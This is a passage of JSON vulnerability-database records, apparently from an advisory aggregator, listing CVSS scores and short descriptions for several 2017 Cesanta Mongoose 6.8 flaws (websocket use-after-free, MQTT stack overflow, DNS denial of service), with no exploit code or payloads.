"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2017-11-07T16:29:00", "type": "cve", "title": "CVE-2017-2895", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2895"], "modified": "2022-06-07T17:24:00", "cpe": ["cpe:/a:cesanta:mongoose:6.8"], "id": "CVE-2017-2895", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2895", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}, "cpe23": ["cpe:2.3:a:cesanta:mongoose:6.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-06-13T20:35:31", "description": "An exploitable memory corruption vulnerability exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause a buffer to be allocated while leaving stale pointers which leads to a use-after-free vulnerability which can be exploited to achieve remote code execution. An attacker needs to send a specially crafted websocket packet over the network to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-07T16:29:00", "type": "cve", "title": "CVE-2017-2922", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2922"], "modified": "2022-06-13T19:16:00", "cpe": ["cpe:/a:cesanta:mongoose:6.8"], "id": "CVE-2017-2922", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2922", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:cesanta:mongoose:6.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-06-07T18:43:55", "description": "An exploitable stack buffer overflow vulnerability exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT SUBSCRIBE packet can cause a stack buffer overflow resulting in remote code execution. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-07T16:29:00", "type": "cve", "title": "CVE-2017-2894", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2894"], "modified": "2022-06-07T17:24:00", "cpe": ["cpe:/a:cesanta:mongoose:6.8"], "id": "CVE-2017-2894", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2894", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:cesanta:mongoose:6.8:*:*:*:*:*:*:*"]}], "checkpoint_advisories": [{"lastseen": "2022-06-13T22:29:50", "description": "An infinite loop vulnerability exists in the DNS server functionality of Cesanta Mongoose. The vulnerability is due to insufficient handling of compressed names in DNS queries and responses. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted DNS query or response to an application implementing the Mongoose DNS server functionality or DNS client functionality, respectively.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-11-16T00:00:00", "type": "checkpoint_advisories", "title": "Cesanta Mongoose DNS Compressed Name Denial of Service (CVE-2017-2909)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2909"], "modified": "2017-11-27T00:00:00", "id": "CPAI-2017-1001", "href": "", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}]}

Vulnerability Spotlight: Multiple Vulnerabilities in Cesanta Mongoose Server

Description

Related